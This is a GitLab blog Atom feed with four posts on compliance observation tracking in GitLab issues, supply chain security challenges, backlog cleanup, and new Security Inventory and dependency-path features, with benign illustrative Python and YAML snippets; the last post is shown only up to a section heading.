<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
    <id>https://about.gitlab.com/blog</id>
    <title>GitLab</title>
    <updated>2025-07-29T14:39:59.954Z</updated>
    <generator>https://github.com/jpmonette/feed</generator>
    <author>
        <name>The GitLab Team</name>
    </author>
    <link rel="alternate" href="https://about.gitlab.com/blog"/>
    <link rel="self" href="https://about.gitlab.com/atom.xml"/>
    <subtitle>GitLab Blog RSS feed</subtitle>
    <icon>https://about.gitlab.com/favicon.ico</icon>
    <rights>All rights reserved 2025</rights>
    <entry>
        <title type="html"><![CDATA[How to transform compliance observation management with GitLab]]></title>
        <id>https://about.gitlab.com/blog/how-to-transform-compliance-observation-management-with-gitlab/</id>
        <link href="https://about.gitlab.com/blog/how-to-transform-compliance-observation-management-with-gitlab/"/>
        <updated>2025-07-24T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>An observation is a compliance finding or deficiency identified during control monitoring. This is essentially a gap between what your security controls should be doing and what they're actually doing. Observations can stem from design deficiencies where the control isn't structured properly to meet requirements, operating effectiveness issues where the control exists but isn't working as intended, or evidence gaps where required documentation or proof of control execution is missing.</p>
<p>These observations emerge from our quarterly control monitoring process, where we systematically assess the effectiveness of security controls supporting our certifications (SOC 2, ISO 27001, etc.). Observations can also be the output of our external audits from third-party assessors. Observations aren't just compliance checkboxes; they represent real security risks that need prompt, visible remediation.</p>
<p>Observation management is the process by which we manage these observations from identification through remediation to closure. In this article, you'll learn how the GitLab Security Team uses the DevSecOps platform to manage and remediate observations, and the efficiencies we've realized from doing so.</p>
<h2>The GitLab observation lifecycle: From identification to resolution</h2>
<p>The lifecycle of an observation encompasses the entire process from initial identification by compliance engineers through to completed remediation by remediation owners. This lifecycle enables transparent, real-time status reporting that is easier for all stakeholders to understand and follow.</p>
<p>Here are the stages of the observation lifecycle:</p>
<p><strong>1. Identification</strong></p>
<ul>
<li>Compliance engineers identify potential observations during quarterly monitoring.</li>
<li>Initial validation occurs to confirm the finding represents a genuine control gap.</li>
<li>Detailed documentation begins immediately in a GitLab issue.</li>
<li>The root cause of the observation is determined and a remediation plan to address the root cause is established.</li>
</ul>
<p><strong>2. Validation</strong></p>
<ul>
<li>Issue is assigned to the appropriate remediation owner (usually a team lead or department manager).</li>
<li>Remediation owner reviews and confirms they understand and accept ownership.</li>
<li>The remediation plan is reviewed, prioritized, and updated collaboratively as needed.</li>
</ul>
<p><strong>3. In-progress</strong></p>
<ul>
<li>Active remediation work begins with clear milestones and deadlines.</li>
<li>Regular updates are provided through GitLab comments and status changes.</li>
<li>Collaboration happens transparently where all stakeholders can see progress.</li>
</ul>
<p><strong>4. Remediated</strong></p>
<ul>
<li>Remediation owner marks work complete and provides evidence.</li>
<li>Issue transitions to compliance review for validation.</li>
</ul>
<p><strong>5. Resolution</strong></p>
<ul>
<li>Compliance engineer verifies exit criteria are met.</li>
<li>The issue is closed with final documentation.</li>
<li>Lessons learned are captured for future prevention.</li>
</ul>
<p><strong>Alternative paths</strong> handle blocked work, risk acceptance decisions, and stalled remediation efforts with appropriate escalation workflows.
<img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1753301753/pbvheikwpivuvhzd5ith.png" alt="Example of observation lifecycle"></p>
<p align="center"><i>Example of observation lifecycle</i></p>
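<p>As a rough mental model, the stages above behave like a small state machine: An observation can only move along defined transitions. The following Python sketch is our own illustration (not GitLab tooling), with the alternative "blocked" path simplified:</p>

```python
# Hypothetical sketch: the observation lifecycle as a simple state machine.
# Stage names mirror the workflow described above; this is illustrative only.

ALLOWED_TRANSITIONS = {
    "identified": {"validated"},
    "validated": {"in progress"},
    "in progress": {"remediated", "blocked"},
    "blocked": {"in progress"},                 # alternative path: work resumes
    "remediated": {"resolved", "in progress"},  # compliance review may reopen work
    "resolved": set(),                          # terminal state
}

def advance(current: str, target: str) -> str:
    """Move an observation to a new stage, enforcing the lifecycle order."""
    if target not in ALLOWED_TRANSITIONS.get(current, set()):
        raise ValueError(f"cannot move from {current!r} to {target!r}")
    return target

# Walk one observation through the happy path.
stage = "identified"
for nxt in ("validated", "in progress", "remediated", "resolved"):
    stage = advance(stage, nxt)
print(stage)  # resolved
```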
<h2>The power of transparency in GitLab</h2>
<p>Effective observation management shouldn't require detective work to determine basic information like ownership, status, or priority. Yet most organizations find themselves exactly in this scenario: compliance teams chasing updates, operational teams unaware of their responsibilities, and leadership lacking visibility into real risk exposure until audit season arrives.</p>
<p>The Security Compliance team at GitLab faced these exact problems. Our team initially used a dedicated GRC tool as the single source of truth for outstanding observations, but the lack of visibility to key stakeholders meant minimal remediation actually occurred. The team found themselves spending their time on administrative work, rather than guiding remediation efforts.</p>
<p>Our solution was to move observation management directly into GitLab issues within a dedicated project. This approach transforms observations from compliance issues into visible, actionable work items that integrate naturally into development and operations workflows. Every stakeholder can see what needs attention, collaborate on remediation plans, and track progress in real time, creating the transparency and accountability that traditional tools simply can't deliver.</p>
<h3>Smart organization through labels and issue boards</h3>
<p>GitLab allows teams to categorize observation issues into multiple organizational views. The Security Compliance team uses the following to categorize observations:</p>
<ul>
<li><strong>Workflow:</strong> <code>~workflow::identified</code>, <code>~workflow::validated</code>, <code>~workflow::in progress</code>, <code>~workflow::remediated</code></li>
<li><strong>Department:</strong> <code>~dept::engineering</code>, <code>~dept::security</code>, <code>~dept::product</code></li>
<li><strong>Risk Severity:</strong> <code>~risk::critical</code>, <code>~risk::high</code>, <code>~risk::medium</code>, <code>~risk::low</code></li>
<li><strong>System:</strong> <code>~system::gitlab</code>, <code>~system::gcp</code>, <code>~system::hr-systems</code></li>
<li><strong>Program:</strong> <code>~program::soc2</code>, <code>~program::iso</code>, <code>~program::fedramp</code>, <code>~program::pci</code></li>
</ul>
<p>These labels are then leveraged to create issue boards:</p>
<ul>
<li><strong>Workflow boards</strong> visualize the observation lifecycle stages.</li>
<li><strong>Department boards</strong> show each team's remediation workload.</li>
<li><strong>Risk-based boards</strong> prioritize critical findings requiring immediate attention.</li>
<li><strong>System boards</strong> visualize observations by system.</li>
<li><strong>Program boards</strong> track certification-specific observation resolution.</li>
</ul>
<p>Labels enable powerful filtering and reporting while supporting automated workflows through our triage bot policies. Please refer to the automation section for more details on our automation strategy.</p>
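<p>To make the filtering concrete, here is a small Python sketch of what an issue board column effectively does: select the issues carrying a given combination of scoped labels. The issue data below is invented; in practice it would come from the GitLab Issues API:</p>

```python
# Illustrative sketch: label-based filtering, the way an issue board column
# works. Issue IIDs and labels are made-up sample data.

issues = [
    {"iid": 101, "labels": ["workflow::in progress", "risk::critical", "dept::engineering"]},
    {"iid": 102, "labels": ["workflow::identified", "risk::low", "dept::security"]},
    {"iid": 103, "labels": ["workflow::in progress", "risk::high", "dept::security"]},
]

def board_column(issues, *required_labels):
    """Return the issues carrying every label in required_labels."""
    return [i for i in issues if set(required_labels) <= set(i["labels"])]

# "Risk-based board" column: critical findings currently being worked on.
urgent = board_column(issues, "workflow::in progress", "risk::critical")
print([i["iid"] for i in urgent])  # [101]
```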
<h2>Automation: Working smarter, not harder</h2>
<p>Managing dozens of observations across multiple certifications requires smart automation. The Security Compliance team utilizes the <a href="https://gitlab.com/gitlab-org/ruby/gems/gitlab-triage">triage bot</a>, an open source project hosted on GitLab. The gem enables project managers to automatically triage issues in GitLab projects or groups based on defined policies, which helps maintain issue hygiene so stakeholders can focus their efforts on remediation.</p>
<p>Within the observation management project, we have policies that ensure each issue has an assignee and the required labels, that issues are updated every 30 days, and that blocked and stalled issues are nudged every 90 days. In addition, a weekly summary issue lists all the issues out of compliance with these policies. This enables team members to monitor issues efficiently and spend less time on administrative tasks.</p>
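<p>As a rough illustration of what such policies look like, here is a sketch of a <code>.triage-policies.yml</code> file. The rule names, intervals, and wording are our own invented examples rather than GitLab's actual policies; the overall shape (conditions, actions, summarize) follows the gitlab-triage project's documented format:</p>

```yaml
# Illustrative triage policy sketch -- rule names and values are invented.
resource_rules:
  issues:
    rules:
      # Nudge open issues that have not been updated recently.
      - name: Nudge stale observations
        conditions:
          state: opened
          date:
            attribute: updated_at
            condition: older_than
            interval_type: days
            interval: 30
        actions:
          comment: |
            This observation has had no update in 30 days.
            Please post a status update.
      # Roll out-of-compliance issues up into a single summary issue.
      - name: Weekly out-of-compliance summary
        conditions:
          state: opened
          date:
            attribute: updated_at
            condition: older_than
            interval_type: days
            interval: 30
        actions:
          summarize:
            title: Weekly observation hygiene report
            item: "- [ ] {{web_url}} {{title}}"
            summary: |
              The following observations are out of compliance
              with our hygiene policies:

              {{items}}
```

<p>A policy file like this can then be run on a schedule, for example from a scheduled CI pipeline, so the hygiene checks happen without any manual effort.</p>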
<h2>Measuring success: Key metrics and reporting</h2>
<p>GitLab's raw issue data can be turned into actionable intelligence. Organizations can extract meaningful insights from each issue's creation date, close date, last-updated date, and labels. The following metrics provide a comprehensive view of your observation management effectiveness:</p>
<p><strong>Resolution Efficiency Analysis:</strong> Average time from identification to resolution by department and severity</p>
<p>Track issue creation versus close dates across departments and severity levels to identify bottlenecks and measure performance against SLAs. This reveals which teams excel at rapid response and which may need additional resources or process improvements.</p>
<p><strong>Real-Time Risk Assessment:</strong> Current risk profile based on open critical and high risk observations</p>
<p>Leverage risk level labels to create dynamic visualizations of your organization's current risk exposure. This provides leadership with an immediate understanding of critical observations requiring urgent attention.</p>
<p><strong>Strategic Resource Allocation:</strong> Department-level risk distribution for targeted improvement efforts</p>
<p>Identify which departments are responsible for remediation of the highest-risk observations to prioritize resources, oversight, and projects. This data-driven approach ensures improvement efforts focus where they'll have maximum impact.</p>
<p><strong>Compliance Readiness Monitoring:</strong> Certification-specific observation counts and resolution rates</p>
<p>Utilize certification labels to assess audit preparedness and track progress toward compliance goals. This metric provides early warning of potential certification risks and validates remediation efforts.</p>
<p><strong>Accountability Tracking:</strong> Overdue remediations</p>
<p>Monitor SLA compliance to ensure observations receive timely attention. This metric highlights systemic delays and enables proactive intervention before minor issues become major problems.</p>
<p><strong>Engagement Health Check:</strong> Observation freshness</p>
<p>Track recent activity (updates within 30 days) to ensure observations remain actively managed rather than forgotten. This metric identifies stagnant issues that may require escalation or reassignment.</p>
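<p>As a sketch of how two of these metrics fall out of the raw issue fields, the following Python example (with invented sample data) computes the average resolution time for a risk label and flags issues that fail the 30-day freshness check:</p>

```python
# Hypothetical sketch: deriving resolution time and freshness metrics from
# raw issue fields. Dates and labels are made-up sample data.
from datetime import datetime, timedelta

issues = [
    {"created_at": "2025-01-01", "closed_at": "2025-01-31", "updated_at": "2025-01-31", "labels": ["risk::high"]},
    {"created_at": "2025-02-01", "closed_at": None, "updated_at": "2025-02-10", "labels": ["risk::critical"]},
    {"created_at": "2025-03-01", "closed_at": "2025-03-11", "updated_at": "2025-03-11", "labels": ["risk::high"]},
]

def _d(s):
    return datetime.strptime(s, "%Y-%m-%d")

def avg_resolution_days(issues, label):
    """Mean identification-to-resolution time for closed issues with a label."""
    spans = [(_d(i["closed_at"]) - _d(i["created_at"])).days
             for i in issues if i["closed_at"] and label in i["labels"]]
    return sum(spans) / len(spans) if spans else None

def stale(issues, as_of, max_age_days=30):
    """Open issues with no update within max_age_days (the freshness check)."""
    cutoff = _d(as_of) - timedelta(days=max_age_days)
    return [i for i in issues if i["closed_at"] is None and _d(i["updated_at"]) < cutoff]

print(avg_resolution_days(issues, "risk::high"))  # 20.0
print(len(stale(issues, "2025-04-01")))           # 1
```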
<h2>Advanced strategies: Taking observation management further</h2>
<p>Here's what you can do to deepen the impact of observation management in your organization.</p>
<p><strong>Integrate with security tools</strong></p>
<p>Modern observation management extends beyond manual tracking by connecting with your existing security infrastructure. Organizations can configure vulnerability scanners and security monitoring tools to automatically generate observation issues, eliminating manual data entry and ensuring comprehensive coverage.</p>
<p><strong>Apply predictive analytics</strong></p>
<p>Historical observation data becomes a powerful forecasting tool when properly analyzed. Organizations can leverage past remediation patterns to predict future timelines and resource requirements, enabling more accurate project planning and budget allocation. Pattern recognition in observation types reveals systemic vulnerabilities that warrant preventive controls, shifting focus from reactive to proactive risk management. Advanced implementations incorporate multiple data sources into sophisticated risk scoring algorithms that provide nuanced threat assessments and priority rankings.</p>
<p><strong>Customize for stakeholders</strong></p>
<p>Effective observation management recognizes that different roles require different perspectives on the same data. Role-based dashboards deliver tailored views for executives seeking high-level risk summaries, department managers tracking team performance, and individual contributors managing their assigned observations. Automated reporting systems can be configured to match various audience needs and communication preferences, from detailed technical reports to executive briefings. Self-service analytics capabilities empower stakeholders to conduct ad-hoc analysis and generate custom insights without requiring technical expertise or support.</p>
<h2>Move from mere compliance to operational excellence</h2>
<p>GitLab's approach to observation management represents more than a tool change: It's a fundamental shift from reactive compliance to proactive risk mitigation. By breaking down silos between compliance teams and operational stakeholders, organizations achieve unprecedented visibility while dramatically improving remediation outcomes.</p>
<p>The results are measurable: faster resolution through transparent accountability, active stakeholder collaboration instead of reluctant participation, and continuous audit readiness rather than periodic scrambles. Automated workflows free compliance professionals for strategic work while rich data enables predictive analytics that shift focus from reactive firefighting to proactive prevention.</p>
<p>Most importantly, this approach elevates compliance from burden to strategic enabler. When observations become visible, trackable work items integrated into operational workflows, organizations develop stronger security culture and lasting improvements that extend beyond any single audit cycle. The outcome isn't just regulatory compliance. It's organizational resilience and competitive advantage through superior risk management.</p>
<blockquote>
<p>Want to learn more about GitLab's security compliance practices? Check out our <a href="https://handbook.gitlab.com/handbook/security/security-assurance/security-compliance/">Security Compliance Handbook</a> for additional insights and implementation guidance.</p>
</blockquote>
]]></content>
        <author>
            <name>Madeline Lake</name>
            <uri>https://about.gitlab.com/blog/authors/madeline-lake</uri>
        </author>
        <published>2025-07-24T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[Software supply chain security guide: Why organizations struggle]]></title>
        <id>https://about.gitlab.com/blog/software-supply-chain-security-guide-why-organizations-struggle/</id>
        <link href="https://about.gitlab.com/blog/software-supply-chain-security-guide-why-organizations-struggle/"/>
        <updated>2025-07-24T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>Ask most development teams about supply chain security, and you'll get answers focused on vulnerability scanning or dependency management. While these are components of supply chain security, they represent a dangerously narrow view of a much broader challenge.</p>
<p><strong>Supply chain security isn't just about scanning dependencies.</strong> It encompasses the entire journey from code creation to production deployment, including:</p>
<ul>
<li><strong>Source security:</strong> protecting code repositories, managing contributor access, and ensuring code integrity</li>
<li><strong>Build security:</strong> securing build environments and preventing tampering during compilation and packaging</li>
<li><strong>Artifact security:</strong> ensuring the integrity of containers, packages, and deployment artifacts</li>
<li><strong>Deployment security:</strong> securing the delivery mechanisms and runtime environments</li>
<li><strong>Tool security:</strong> hardening the development tools and platforms themselves</li>
</ul>
<p>The &quot;chain&quot; in supply chain security refers to this interconnected series of steps. A weakness anywhere in the chain can compromise the entire software delivery process.</p>
<p>The <a href="https://www.cisa.gov/news-events/news/joint-statement-federal-bureau-investigation-fbi-cybersecurity-and-infrastructure-security">2020 SolarWinds attack</a> illustrates this perfectly. In what became one of the largest supply chain attacks in history, state-sponsored attackers compromised the build pipeline of SolarWinds' Orion network management software. Rather than exploiting a vulnerable dependency or hacking the final application, they injected malicious code during the compilation process itself.</p>
<p>The result was devastating: More than 18,000 organizations, including multiple U.S. government agencies, unknowingly installed backdoored software through normal software updates. The source code was clean, the final application appeared legitimate, but the build process had been weaponized. This attack remained undetected for months, demonstrating how supply chain vulnerabilities can bypass traditional security measures.</p>
<h3>Common misconceptions that leave organizations vulnerable</h3>
<p>Despite growing awareness of supply chain threats, many organizations remain exposed because they operate under fundamental misunderstandings about what software supply chain security actually entails. These misconceptions create dangerous blind spots:</p>
<ul>
<li>Thinking software supply chain security equals dependency scanning</li>
<li>Focusing only on open source components while ignoring proprietary code risks</li>
<li>Believing that code signing alone provides sufficient protection</li>
<li>Assuming that secure coding practices eliminate supply chain risks</li>
<li>Treating it as a security team problem rather than a development workflow challenge</li>
</ul>
<p><img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1753200077/kqndvlxyvncshdiq0xea.png" alt="Software supply chain security dependency chart"></p>
<h2>How AI is changing the game</h2>
<p>Just as organizations are grappling with traditional software supply chain security challenges, artificial intelligence (AI) is introducing entirely new attack vectors and amplifying existing ones in unprecedented ways.</p>
<h3>AI-powered attacks: More sophisticated, more scalable</h3>
<p>Attackers are using AI to automate vulnerability discovery, generate convincing social engineering attacks targeting developers, and systematically analyze public codebases for weaknesses. What once required manual effort can now be done at scale — with precision.</p>
<h3>The AI development supply chain introduces new risks</h3>
<p>AI is reshaping the entire development lifecycle, but it's also introducing significant security blind spots:</p>
<ul>
<li><strong>Model supply chain attacks:</strong> Pre-trained models from sources like Hugging Face or GitHub may contain backdoors or poisoned training data.</li>
<li><strong>Insecure AI-generated code:</strong> Developers using AI coding assistants may unknowingly introduce vulnerable patterns or unsafe dependencies.</li>
<li><strong>Compromised AI toolchains:</strong> The infrastructure used to train, deploy, and manage AI models creates a new attack surface.</li>
<li><strong>Automated reconnaissance:</strong> AI enables attackers to scan entire ecosystems to identify high-impact supply chain targets.</li>
<li><strong>Shadow AI and unsanctioned tools:</strong> Developers may integrate external AI tools that haven't been vetted.</li>
</ul>
<p>The result? AI doesn't just introduce new vulnerabilities; it amplifies the scale and impact of existing ones. Organizations can no longer rely on incremental improvements. The threat landscape is evolving faster than current security practices can adapt.</p>
<p><img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1753200139/xuxezxld6ztlvjocgjlx.png" alt="AI amplification effect"></p>
<h2>Why most organizations still struggle</h2>
<p>Even organizations that understand supply chain security often fail to act effectively. The statistics reveal a troubling pattern of awareness without corresponding behavior change.</p>
<p>When <a href="https://www.cnn.com/2021/05/19/politics/colonial-pipeline-ransom/index.html">Colonial Pipeline paid hackers $4.4 million</a> in 2021 to restore operations, or when 18,000 organizations fell victim to the SolarWinds attack, the message was clear: Supply chain vulnerabilities can bring down critical infrastructure and compromise sensitive data at unprecedented scale.</p>
<p>Yet, despite this awareness, most organizations continue with business as usual. The real question isn't whether organizations care about supply chain security — it's why caring alone isn't translating into effective protection.</p>
<p>The answer lies in four critical barriers that prevent effective action:</p>
<p><strong>1. The false economy mindset</strong></p>
<p>Organizations often focus on what security costs rather than asking, &quot;What's the most effective approach?&quot; This cost-first thinking creates expensive downstream problems.</p>
<p><strong>2. Skills shortage reality</strong></p>
<p>With <a href="https://codific.com/bsimm-building-security-in-maturity-model-a-complete-guide/">organizations averaging 4 security professionals per 100 developers</a>, according to BSIMM research, and <a href="https://www.isc2.org/Insights/2024/09/Employers-Must-Act-Cybersecurity-Workforce-Growth-Stalls-as-Skills-Gaps-Widen">90% of organizations reporting critical cybersecurity skills gaps</a>, according to ISC2, traditional approaches are mathematically impossible to scale.</p>
<p><strong>3. Misaligned organizational incentives</strong></p>
<p>Developer OKRs focus on feature velocity while security teams measure different outcomes. When C-suite priorities emphasize speed-to-market over security posture, friction becomes inevitable.</p>
<p><strong>4. Tool complexity overload</strong></p>
<p>The <a href="https://www.gartner.com/en/newsroom/press-releases/2025-03-03-gartner-identifiesthe-top-cybersecurity-trends-for-2025">average enterprise uses 45 cybersecurity tools</a>, <a href="https://www.ponemon.org/news-updates/blog/security/new-ponemon-study-on-malware-detection-prevention-released.html">40% of security alerts are false positives</a>, and teams must <a href="https://newsroom.ibm.com/2020-06-30-IBM-Study-Security-Response-Planning-on-the-Rise-But-Containing-Attacks-Remains-an-Issue">coordinate across 19 tools on average for each incident</a>.</p>
<p>These barriers create a vicious cycle: Organizations recognize the threat, invest in security solutions, but implement them in ways that don't drive the desired outcomes.</p>
<h2>The true price of supply chain insecurity</h2>
<p>Supply chain attacks create risk and expenses that extend far beyond initial remediation. Understanding these hidden multipliers helps explain why prevention is not just preferable – it's essential for business continuity.</p>
<p><strong>Time becomes the enemy</strong></p>
<ul>
<li>Average time to identify and contain a supply chain breach: <a href="https://keepnetlabs.com/blog/171-cyber-security-statistics-2024-s-updated-trends-and-data">277 days</a></li>
<li>Customer trust rebuilding period: <a href="https://www.bcg.com/publications/2024/rebuilding-corporate-trust">2-3+ years</a></li>
<li>Engineering hours diverted from product development to security remediation</li>
</ul>
<p><strong>Reputation damage compounds</strong></p>
<p>When attackers compromise your supply chain, they don't just steal data – they undermine the foundation of customer trust. <a href="https://www.metacompliance.com/blog/data-breaches/5-damaging-consequences-of-a-data-breach">Customer churn rates typically increase 33% post-breach</a>, while partner relationships require costly re-certification processes. Competitive positioning suffers as prospects choose alternatives perceived as &quot;safer.&quot;</p>
<p><strong>Regulatory reality bites</strong></p>
<p>The regulatory landscape has fundamentally shifted. <a href="https://www.skillcast.com/blog/20-biggest-gdpr-fines">GDPR fines now average over $50 million for significant data breaches</a>. The EU's new <a href="https://about.gitlab.com/blog/gitlab-supports-banks-in-navigating-regulatory-challenges/#european-cyber-resilience-act-(cra)">Cyber Resilience Act</a> mandates supply chain transparency. U.S. federal contractors must provide software bills of materials (<a href="https://about.gitlab.com/blog/the-ultimate-guide-to-sboms/">SBOMs</a>) for all software purchases — a requirement that's rapidly spreading to private sector procurement.</p>
<p><strong>Operational disruption multiplies</strong></p>
<p>Beyond the direct costs, supply chain attacks create operational chaos such as platform downtime during attack remediation, emergency security audits across entire technology stacks, and legal costs from customer lawsuits and regulatory investigations.</p>
<h2>What's wrong with current approaches</h2>
<p>Most organizations confuse security activity with security impact. They deploy scanners, generate lengthy reports, and chase teams to address findings through manual follow-ups. But these efforts often backfire — creating more problems than they solve.</p>
<h3>Massive scanning vs. effective protection</h3>
<p>Enterprises generate over <a href="https://www.securityweek.com/enterprises-generate-10000-security-events-day-average-report/">10,000 security alerts each month, with the most active generating roughly 150,000 events per day</a>. But <a href="https://panther.com/blog/identifying-and-mitigating-false-positive-alerts">63%</a> of these are false positives or low-priority noise. Security teams become overwhelmed and turn into bottlenecks instead of enablers.</p>
<h3>The collaboration breakdown</h3>
<p>The most secure organizations don't have the most tools; they have the strongest DevSecOps collaboration. But most current setups make this harder by splitting workflows across incompatible tools, failing to show developers security results in their environment, and offering no shared visibility into risk and business impact.</p>
<h2>The path forward</h2>
<p>Understanding these challenges is the first step toward building effective supply chain security. The organizations that succeed don't just add more security tools, they fundamentally rethink how security integrates with development workflows. They also review end-to-end software delivery workflows to simplify processes, reduce tools and improve collaboration.</p>
<p>At GitLab, we've seen how integrated DevSecOps platforms can address these challenges by bringing security directly into the development workflow. In our next article in this series, we'll explore how leading organizations are transforming their approach to supply chain security through developer-native solutions, AI-powered automation, and platforms that make security a natural part of building great software.</p>
<blockquote>
<p>Learn more about <a href="https://about.gitlab.com/solutions/supply-chain/">GitLab's software supply chain security capabilities</a>.</p>
</blockquote>
]]></content>
        <author>
            <name>Itzik Gan Baruch</name>
            <uri>https://about.gitlab.com/blog/authors/itzik-gan-baruch</uri>
        </author>
        <published>2025-07-24T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[Inside GitLab's Healthy Backlog Initiative]]></title>
        <id>https://about.gitlab.com/blog/inside-gitlabs-healthy-backlog-initiative/</id>
        <link href="https://about.gitlab.com/blog/inside-gitlabs-healthy-backlog-initiative/"/>
        <updated>2025-07-23T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>At GitLab, we are proud of the strong, collaborative relationship with our community. We encourage everyone to contribute to GitLab. Over the years, those community contributions have helped strengthen the GitLab platform. But as we've grown, community participation via GitLab issues has grown, resulting in an unwieldy issue backlog.</p>
<p>GitLab's Product and Engineering teams recently launched the <a href="https://gitlab.com/groups/gitlab-org/-/epics/18639">Healthy Backlog Initiative</a> to address this backlog and refine our approach to managing contributed issues going forward.</p>
<p>Issues with ongoing community engagement, recent activity, or a clear strategic alignment will remain open. We'll be closing issues that are no longer relevant, lack community interest, or no longer fit our current product direction.</p>
<p>This focus will lead to increased innovation, better expectation setting, and faster development and delivery cycles of community-contributed capabilities.</p>
<h2>What is the Healthy Backlog Initiative?</h2>
<p>Over time, the GitLab community has submitted tens of thousands of issues, including bugs, feature requests, and feedback items. Currently, the <a href="https://gitlab.com/gitlab-org/gitlab/-/issues">main GitLab issue tracker</a> contains over 65,000 issues; some are no longer applicable to the platform, while others remain relevant today.</p>
<p>Our Healthy Backlog Initiative will cull the backlog and establish a workstream for our Product and Engineering teams to implement a more focused approach to backlog management. They will conduct weekly assessments of the backlog to ensure that we prioritize issues that align with our product strategy and roadmap.</p>
<p><strong>Note:</strong> If you believe a closed issue does align with GitLab’s product strategy and roadmap, or if you're actively contributing to the request, we strongly encourage you to comment on the issue with updated context and current details. We are committed to reviewing these updated issues as part of our regular assessment efforts.</p>
<h2>How does this change benefit you?</h2>
<p>This streamlined approach means direct, tangible improvements for every GitLab user:</p>
<ul>
<li>
<p><strong>Sharper focus and faster delivery:</strong> By narrowing our backlog to strategically aligned features, we can dedicate development resources more effectively. This means you can expect shorter development cycles and more meaningful improvements to your GitLab experience.</p>
</li>
<li>
<p><strong>Clearer expectations:</strong> We are committed to transparent communication about what's on our roadmap and what isn't, empowering you to make informed decisions about your workflows and contributions.</p>
</li>
<li>
<p><strong>Accelerated feedback loops:</strong> With a clean backlog, new feedback and feature requests will be reviewed and prioritized more efficiently, reducing overall triage time and ensuring timely issues receive the necessary attention. This creates a more responsive feedback loop for everyone.</p>
</li>
</ul>
<p>This initiative does not diminish the significance of community feedback and contributions. We are taking this action to create clarity around what GitLab Team Members can realistically commit to delivering, and to ensure that all feedback receives proper consideration.</p>
<h2>Looking forward</h2>
<p>The GitLab Healthy Backlog Initiative reflects our commitment to being transparent and effective stewards of the GitLab platform. By clearly communicating our priorities and focusing our efforts on what we can realistically deliver over the next year, we're better positioned to meet and exceed your expectations.</p>
<p>Your continued participation and feedback help make GitLab stronger. Every comment, merge request, bug report, and feature suggestion contributes to our shared vision. And we’re still rewarding you for that as well, with initiatives like our monthly Notable Contributor program, Swag rewards for leveling up, Hackathon winners, and more, all available through our <a href="https://contributors.gitlab.com">Contributor Portal</a>.</p>
<blockquote>
<p>To learn more about how to contribute to GitLab, <a href="https://about.gitlab.com/community/">visit our community site</a>. To share feedback on this project, please add your comments on <a href="https://gitlab.com/gitlab-org/gitlab/-/issues/556865">the feedback issue</a> in this <a href="https://gitlab.com/groups/gitlab-org/-/epics/18639">epic</a>.</p>
</blockquote>
]]></content>
        <author>
            <name>Stan Hu</name>
            <uri>https://about.gitlab.com/blog/authors/stan-hu</uri>
        </author>
        <published>2025-07-23T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[Bridging the visibility gap in software supply chain security]]></title>
        <id>https://about.gitlab.com/blog/bridging-the-visibility-gap-in-software-supply-chain-security/</id>
        <link href="https://about.gitlab.com/blog/bridging-the-visibility-gap-in-software-supply-chain-security/"/>
        <updated>2025-07-21T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>Our most recent release, <a href="https://about.gitlab.com/releases/2025/07/17/gitlab-18-2-released/">GitLab 18.2</a>, introduces two new capabilities to improve software supply chain security: Security Inventory and Dependency Path visualization.</p>
<p>Security Inventory gives Application Security teams a centralized, portfolio-wide view of risk and scan coverage across their GitLab groups and projects, helping them identify blind spots and prioritize risk mitigation efforts. Dependency Path visualization equips developers with a clear view of how open source vulnerabilities are introduced through the dependency chain, making it easier to pinpoint the right fix.</p>
<p>Together, these capabilities help security and development teams build more secure applications by providing visibility into where risks exist, context to remediate them, and workflows that support collaboration. Unlike other solutions, this all happens in the same platform developers use to build, review, and deploy software, creating a unified developer and AppSec experience without the overhead of integrations.</p>
<h2>Open source widens the attack surface area</h2>
<p>Modern applications <a href="https://about.gitlab.com/developer-survey/">heavily</a> rely on open source software. However, open source introduces a significant security risk — components can be outdated, unmaintained, or unknowingly expose vulnerabilities. That's why Software Composition Analysis (SCA) has become a cornerstone of modern AppSec programs.</p>
<p>A key challenge in vulnerability management is effectively managing <em>transitive dependency risk</em>. These components are often buried deep in the dependency chain, making it difficult to trace how a vulnerability was introduced or determine what needs to be updated to fix it. Worse, they account for nearly <a href="https://arxiv.org/abs/2503.22134?">two-thirds</a> of known open source vulnerabilities. Without clear visibility into the full dependency path, teams are left guessing, delaying remediation and increasing risk.</p>
<blockquote>
<p>Transitive dependencies are packages that your application uses indirectly. They're pulled in automatically by the direct dependencies you explicitly include. These nested dependencies can introduce vulnerabilities without the developer ever knowing they're in the project.</p>
</blockquote>
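<p>Conceptually, recovering the chain from a direct dependency to a vulnerable transitive package is a search over the project's resolved dependency graph: a breadth-first search from the direct dependencies yields the shortest introduction path. The sketch below illustrates the idea with hypothetical package names; it is not GitLab's implementation.</p>

```python
from collections import deque

def dependency_path(graph, roots, vulnerable):
    """Return the shortest chain from a direct dependency (root) to the
    vulnerable transitive package, or None if it is not reachable."""
    queue = deque([(root, [root]) for root in roots])
    seen = set(roots)
    while queue:
        pkg, path = queue.popleft()
        if pkg == vulnerable:
            return path
        for dep in graph.get(pkg, []):
            if dep not in seen:
                seen.add(dep)
                queue.append((dep, path + [dep]))
    return None

# Hypothetical lockfile graph: the app never pulls in "zlib-sys" directly.
graph = {
    "express": ["body-parser"],
    "body-parser": ["qs"],
    "qs": ["zlib-sys"],
}
print(dependency_path(graph, ["express"], "zlib-sys"))
# ['express', 'body-parser', 'qs', 'zlib-sys']
```

<p>The resulting chain is exactly the kind of route that tells a developer which direct dependency to bump to eliminate the vulnerable component.</p>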
<p>This challenge becomes exponentially more difficult at scale. When security teams are responsible for hundreds, or even thousands, of repositories — each with its own dependencies, build pipelines, and owners — answering fundamental questions about application security risk posture becomes challenging. And in an era of growing software supply chain threats, where vulnerabilities can propagate across systems through shared libraries and CI/CD configurations, these blind spots take on even greater consequence.</p>
<h2>Security Inventory: Visibility that scales</h2>
